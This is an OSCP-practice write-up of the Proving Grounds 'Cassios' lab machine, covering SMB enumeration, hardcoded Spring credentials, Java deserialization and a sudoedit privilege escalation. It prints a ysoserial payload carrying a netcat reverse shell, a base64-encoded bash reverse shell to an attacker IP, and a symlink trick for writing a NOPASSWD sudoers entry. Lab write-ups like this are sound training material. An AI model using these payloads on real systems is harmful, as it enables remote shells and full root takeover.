[OSCP Practice Series 52] Proving Grounds — Cassios
Machine Type: Linux
Initial
Nmap discovered ports 22, 80, 139, 445, and 8080 open. Let’s check SMB first.
There’s a share called Samantha Konstan.
We can access it. Let’s download everything.
Seems like it’s the code of a Java Spring web application. It must be one of the web-accessible ones. Let’s check port 80.
It seems like a static web page. Nothing useful. I will run Gobuster on it while checking other webs. Let’s check port 8080.
Recycler Management System. It seems like this is the source code we found earlier. Let’s analyze the source code now.
There’s a note from the developer.
We know that there’s a user named samantha.
The .ser file holds all the last data saved from the process, it can
be readed from the upper management dashboard app.
We have the recycler.ser file, but it’s empty. I will run Gobuster in the background just in case.
There are default PostgreSQL credentials. Meanwhile, our Gobuster on port 80 found something interesting.
That’s a very uncommon directory.
OKAY, recycler is the name of the other site.
Seems like same files that we got from SMB.
THERE’S A HARDCODED CREDS THIS TIME
@Override
public UserDetailsService userDetailsService() {
UserDetails user =
User.withDefaultPasswordEncoder()
.username("recycler")
.password("DoNotMessWithTheRecycler123")
.roles("USER")
.build();
return new InMemoryUserDetailsManager(user);
}Let’s try to login.
Foothold
We are in. Since this is a Java app and we have the code, I feel that there may be a deserialization attack possible here. On the site, we can access three paths which are /check, /save, and /dashboard. Let’s check the code again.
Ahh, now this makes sense. We have access to the SMB, which seems to have the contents of /home/samantha/backups/. This means we have access to it. It tries to load recycler.ser, which can be our payload injection point. You can learn about Java Deserialization attacks from this awesome Snyk blog.
We just need to create our payload now, we can use Ysoserial for this (https://book.hacktricks.xyz/pentesting-web/deserialization).
java -jar /opt/ysoserial-all.jar CommonsCollections4 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.238 445 >/tmp/f" > recycler.ser
Hm.. it doesn’t work. Let’s try the one provided on hacktricks.
java -jar /opt/ysoserial-all.jar CommonsCollections4 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4yMzgvNDQ1IDA+JjE=}|{base64,-d}|{bash,-i}" > recycler.ser
Nice, we are in.
Getting Root
Immediately, we can see that we could run sudoedit as root to edit recycler.ser in the specified directory..
sudoeditis a command-line tool that allows users to edit files with elevated privileges using thesudomechanism. It's similar to usingsudowith a text editor likenanoorvim
What can we do to escalate our privilege by editing a file? Of course, by adding an /etc/passwd entry or editing /etc/sudoers. I will do it with /etc/sudoers because it’s easier. We just need to create a symlink from /etc/sudoers to /home/samantha/*/recycler.ser and add an entry such as this: samantha ALL=(ALL) NOPASSWD: ALL
ln -s /etc/sudoers /home/samantha/asd/recycler.ser
sudoedit -u root /home/samantha/asd/recycler.serThen just add the malicious sudoers entry.
Nice, we are root.
local.txt: 0e26a302fac03eb9d0423281871ef63a
proof.txt: d63708dc8d251769a617ad9c43fc9426Learned
- Symlink andsudoedit are awesome.
- Always run a directory brute force on all sites
